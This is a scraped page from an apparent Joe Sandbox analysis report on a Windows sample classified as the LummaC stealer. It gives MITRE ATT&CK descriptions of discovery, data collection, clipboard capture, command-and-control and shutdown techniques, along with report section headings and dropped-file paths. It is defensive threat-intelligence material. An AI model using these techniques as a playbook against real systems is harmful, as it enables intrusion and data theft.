Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report vUcZzNWkKc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vUcZzNWkKc.exe.log

C:\Users\user\AppData\Local\Temp\768400\Climb.com

C:\Users\user\AppData\Local\Temp\768400\V

C:\Users\user\AppData\Local\Temp\Alt

C:\Users\user\AppData\Local\Temp\Articles

C:\Users\user\AppData\Local\Temp\Attractions

C:\Users\user\AppData\Local\Temp\Beaches

C:\Users\user\AppData\Local\Temp\Cooked

C:\Users\user\AppData\Local\Temp\Enrolled

C:\Users\user\AppData\Local\Temp\Fingers

Windows Analysis Report
vUcZzNWkKc.exe

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre